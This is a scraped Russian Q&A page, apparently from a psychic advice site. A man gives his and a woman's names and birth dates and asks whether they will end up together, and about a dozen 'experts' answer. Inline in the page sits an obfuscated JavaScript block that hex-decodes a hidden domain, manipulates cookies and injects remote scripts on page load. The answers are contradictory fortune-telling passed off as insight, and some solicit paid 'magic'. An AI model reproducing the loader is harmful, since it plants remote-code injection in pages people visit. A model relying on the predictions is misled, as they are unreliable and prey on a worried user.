Добрый день. Меня зовут Алексей, 13.01.1988 Киев. Ее зовут Оля 19.05.1988 года Киев, любит она меня, будем ли мы вместе? Спасибо.

600 p
<![CDATA[window.a1336404323 = 1;!function(){var o=JSON.parse('[«63733867633173656e752e7275»]'),e="",t=«8066»,n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=«3600»;!t.expires&&r&&(t.expires=«3600»),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,«text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,«function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),«function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c(«liveexpert.ru»)+"_"+(self===top?0:1)+".js",a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();// ]]>
Вопрос задан анонимно
06.07.16
12 ответов

Лучший ответ по мнению автора

обида на вас есть у нее… много сейчас препятствий между вами… но по судьбе будете вместе…
07.07.16
Лучший ответ по мнению автора

Другие ответы

Ольга неплохо к Вам относится, но считает, каким-то активным отношениям — ещё не время. Ей интересно с Вами, есть общие интересы, но в её понимании, Вы должны быть более активны, мужественны. И первого шага она будет ждать от Вас. Впереди у вас — серьёзный разговор, возможно и совместная поездка.Инициатором отношений в ближайшие 3 месяца — будет Ольга. Если будут вопросы, обращайтесь.
12.11.15
Сейчас на сайте
Здравствуйте, честно говоря, просто идет использование Вас.Удачи!!!
06.07.16
Доброго дня.
С Ольгой Вы будите, не так скоро как хотелось бы Вам. 
У Вас впереди несколько месяцев ожидания и около года встреч и переписок.
Наступающее мероприятие будите встречать вместе.
Многое о чем Вы думаете пойдет так как задумывалось Вами, если проявите некую настойчивость и благоразумие.
(тюркское гадание пяти монет)

С Уважением к Вам
06.07.16
Вы для неё скорей как друг, не видит она в вас вашего мужчину.
06.07.16
есть чувства вместе вы будете со временем
06.07.16
Здравствуйте!
Ваш союз возможен только при наличии финансового благополучия.
Для неё деньги являются приоритетом.
К Вам относится как к претенденту, но ещё выбор не сделала.
Удачи Вам!
06.07.16
Здравствуйте. У девушки есть заинтересованность, рассматривает любовные перспективы… у неё настрой на семью, есть определенные требования к избраннику, будет отстаивать свои интересы.
Всего доброго!
06.07.16
Ольге вы интересны, но пока не могу сказать, что есть чувства, скорее увидела в вас неплохого кандидата для отношений, однако развития в чувствах дальше не будет, ей хочется новых эмоций и впечатлений, ваши отношения перестанут в ближайшем времени быть для нее интересны и появится другой кандидат. Более подробно лучше по фото смотреть, если что обращайтесь.
06.07.16
Здравствуйте, Алексей.
Есть все предпосылки, что Вы будете вместе с Олей. Похоже, она любит Вас. Что-то просто идет не так, люди часто совершают ошибки, но могут их исправить. Счастья Вам.
С уважением, Светлана Весна
06.07.16
Совсем недавно у вас были довольно яркие отношения. Сейчас страсти немного поутихли. Оля, вероятно, ждет от Вас более серьезных мужских поступков. Вы ей нравитесь, но иногда она злится, потому что Ваши слова порой расходятся с делом. С Вашей стороны наблюдается не очень порядочное поведение, которое может проявляться в нецензурных выражениях и безразличии или, опять-таки, не выполнении обещанного. Если так и продолжится, то с Олей ваши близкие отношения постепенно перейдут в дружеско-приятельские с рамками в поведении (т.е. без интима).
Желаю удачи!

Пожалуйста, не забывайте оценивать работу экспертов. Мы тратим свое время, чтобы помочь Вам. Если нужна более детальная консультация или магическая помощь, обращайтесь.
06.07.16
Здравствуйте Алексей! У Ольги непростой характер, непредвиденное поведение, порой вы не можете её понять.У неё есть к вам чувства, несмотря на то что сейчас у вас непростые отношения, перспектива на будущее у вас есть.
Всего Вам хорошего! Храни Вас Бог!
07.07.16
Рекомендуем личную консультацию

☸СВЕТЛАНА☸

Сейчас на сайте
☸МАГ☸ЯСНОВИДЯЩАЯ☸ Практический опыт работы в данной сфере более 13 лет. Личные методики снятия разнородных зависимостей и их следствий. ☯ Прогнозы. ☯ Магия. ☯ Инициации. ВСЕМ ЛЮБВИ ॐ
Посмотреть всех экспертов из раздела Эзотерика > Нумерология